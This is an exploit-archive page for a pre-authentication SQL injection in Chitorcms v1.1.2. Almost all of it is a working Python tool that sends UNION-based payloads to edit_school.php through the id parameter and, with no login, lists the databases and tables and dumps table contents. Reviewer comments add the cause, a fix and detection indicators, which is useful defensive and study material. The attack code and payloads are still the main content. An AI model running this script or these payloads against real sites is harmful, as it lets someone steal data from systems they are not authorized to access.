Exploits / Vulnerability Discovered : 2023-04-20 |
Type : webapps |
Platform : php
This exploit / vulnerability (Chitorcms v1.1.2 pre-auth SQL injection) is for educational purposes only; if you use it, you do so at your own risk!
import re
import requests
import optparse
from prettytable import PrettyTable
def DumpTable(url, database, table):
    """Print the rows of ``database.table`` read through the edit_school.php ``id`` injection.

    Two GET requests are sent. The first asks ``INFORMATION_SCHEMA.COLUMNS`` for the
    column names of the table; the second selects those columns from the table itself.
    In both, the third UNION column is a JSON array wrapped in the markers ``qpzkq`` and
    ``qjkbq`` (the hex literals 0x71707a6b71 / 0x716a6b6271 in the payload), and the
    fields of one row are joined with ``xzmdpl`` (0x787a6d64706c).

    Review notes (defensive):
    - The request carries no cookie or credential, matching the "preauth" wording in the
      page title. The server-side cause is presumably that ``id`` is concatenated into
      the SQL statement; the PHP source is not on this page, so confirm there. Binding
      ``id`` as a parameter (or casting it to an integer) is the fix.
    - Indicators visible in this function: ``UNION ALL SELECT``, ``JSON_ARRAYAGG`` and
      ``INFORMATION_SCHEMA`` inside the ``id`` query parameter, the marker hex literals,
      and a User-Agent value that starts with ``5.0 (`` instead of ``Mozilla/5.0 (``.

    Args:
        url: Base URL; the payload path is appended to it unchanged.
        database: Schema name, concatenated into both payloads as text.
        table: Table name, concatenated into both payloads as text.
    """
    header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}
    x = PrettyTable()
    columns = []
    # Request 1: column names. `table` and `database` are placed between double quotes
    # in the WHERE clause by plain string concatenation.
    payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Ccolumn_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=\"" + table + "\" AND table_schema=\"" + database + "\"-- -"
    u = requests.get(url + payload, headers=header)
    try:
        # Take the text between the markers, drop the JSON quotes, split on commas.
        r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
        r = r[0].replace('\"',"").split(',')
        if r == []:
            pass
        else:
            for i in r:
                columns.append(i)
                pass
    except:
        # Bare except: any failure here (e.g. IndexError from r[0] when the markers are
        # absent from the response) is swallowed and `columns` stays as it was.
        pass
    x.field_names = columns
    # Request 2: row data. str(columns) with brackets, quotes and spaces removed becomes
    # the comma-separated argument list of CONCAT_WS.
    payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2C " + str(columns).replace("[","").replace("]","").replace("\'","").replace(" ","") + "))%2C0x716a6b6271) FROM " + database + "." + table + "-- -"
    u = requests.get(url + payload, headers=header)
    try:
        r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
        r = r[0].replace('\"',"").split(',')
        if r == []:
            pass
        else:
            for i in r:
                # One array element per row; split it back into fields.
                i = i.split("xzmdpl")
                x.add_rows([i])
    except ValueError:
        # Presumably raised by PrettyTable when a row has a different number of values
        # than field_names -- confirm. The response is parsed again and every row gets
        # one extra empty field. Rows added before the exception are not removed.
        # Only ValueError is caught here; other exceptions propagate to the caller.
        r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
        r = r[0].replace('\"',"").split(',')
        if r == []:
            pass
        else:
            for i in r:
                i = i.split("xzmdpl")
                i.append("")
                x.add_rows([i])
    print(x)
def ListTables(url, database):
    """Print the table names of one schema, read through the edit_school.php ``id`` injection.

    One GET request is sent. Its ``id`` value appends a three-column ``UNION ALL SELECT``
    over ``INFORMATION_SCHEMA.TABLES``; the third column is a JSON array wrapped in the
    markers ``qpzkq`` and ``qjkbq`` (the hex literals in the payload), which is scraped
    out of the response body.

    Review notes (defensive):
    - The request carries no cookie or credential, matching the "preauth" wording in the
      page title. The server-side cause is presumably that ``id`` is concatenated into
      the SQL statement; the PHP source is not on this page, so confirm there. Binding
      ``id`` as a parameter (or casting it to an integer) is the fix.
    - Indicators visible in this function: ``UNION ALL SELECT``, ``JSON_ARRAYAGG`` and
      ``INFORMATION_SCHEMA`` inside the ``id`` query parameter, the marker hex literals,
      and a User-Agent value that starts with ``5.0 (`` instead of ``Mozilla/5.0 (``.

    Args:
        url: Base URL; the payload path is appended to it unchanged.
        database: Schema name; sent hex-encoded as a ``0x...`` literal.
    """
    ua_header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}
    report = PrettyTable()
    report.field_names = ["TABLES"]
    # Hex form of the schema name, so the injected SQL needs no quote characters for it.
    schema_hex = str(database).encode('utf-8').hex()
    payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Ctable_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x" + schema_hex + ")-- -"
    response = requests.get(url + payload, headers=ua_header)
    try:
        found = re.findall("qpzkq\[(.*?)\]qjkbq", response.text)
        # Text between the markers, JSON quotes removed, one entry per comma.
        for table_name in found[0].replace('\"', "").split(','):
            report.add_row([table_name])
    except:
        # Bare except as on the page: any failure leaves the table as it is.
        pass
    print(report)
def ListDatabases(url):
    """Print the schema names returned through the edit_school.php ``id`` injection.

    One GET request is sent. Its ``id`` value appends a three-column ``UNION ALL SELECT``
    over ``INFORMATION_SCHEMA.SCHEMATA``; the third column is a JSON array wrapped in the
    markers ``qpzkq`` and ``qjkbq`` (the hex literals in the payload), which is scraped
    out of the response body.

    Review notes (defensive):
    - The request carries no cookie or credential, matching the "preauth" wording in the
      page title. The server-side cause is presumably that ``id`` is concatenated into
      the SQL statement; the PHP source is not on this page, so confirm there. Binding
      ``id`` as a parameter (or casting it to an integer) is the fix.
    - Indicators visible in this function: ``UNION ALL SELECT``, ``JSON_ARRAYAGG`` and
      ``INFORMATION_SCHEMA`` inside the ``id`` query parameter, the marker hex literals,
      and a User-Agent value that starts with ``5.0 (`` instead of ``Mozilla/5.0 (``.

    Args:
        url: Base URL; the payload path is appended to it unchanged.
    """
    ua_header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}
    report = PrettyTable()
    report.field_names = ["DATABASES"]
    payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Cschema_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.SCHEMATA-- -"
    response = requests.get(url + payload, headers=ua_header)
    try:
        found = re.findall("qpzkq\[(.*?)\]qjkbq", response.text)
        # Text between the markers, JSON quotes removed, one entry per comma.
        for schema_name in found[0].replace('\"', "").split(','):
            report.add_row([schema_name])
    except:
        # Bare except as on the page: any failure leaves the table as it is.
        pass
    print(report)
# Command-line dispatch. `args`, `options`, `Menu`, `bcolors` and `__description__` are
# not defined in the visible part of the file; presumably they come from an optparse
# setup that the page omits -- confirm against the original.
# NOTE(review): the page lost all indentation, so the nesting below is a reconstruction.
if len(args) != 0 or options == {'url': None, 'l_databases': None, 'database': None, 'l_tables': None, 'table': None, 'dump': None}:
    # Positional arguments were given, or `options` compares equal to the all-None
    # mapping: print the help text and the banner, send no request.
    Menu.print_help()
    print('')
    print(' %s' % __description__)
    print(' Source code put in public domain by ' + bcolors.PURPLE + bcolors.BOLD + 'msd0pe' + bcolors.ENDC + bcolors.ENDC + ',' + bcolors.RED + bcolors.BOLD + 'no Copyright' + bcolors.ENDC + bcolors.ENDC)
    print(' Any malicious or illegal activity may be punishable by law')
    print(' Use at your own risk')
elif len(args) == 0:
    try:
        # Nothing runs without a URL; each further action needs its own option set.
        if options.url != None:
            if options.l_databases != None:
                ListDatabases(options.url)
            if options.database != None:
                if options.l_tables != None:
                    ListTables(options.url, options.database)
                if options.table != None:
                    if options.dump != None:
                        DumpTable(options.url, options.database, options.table)
    except:
        # Bare except: every failure raised by the calls above is reduced to this one
        # message, with no detail about the cause.
        print("Unexpected error")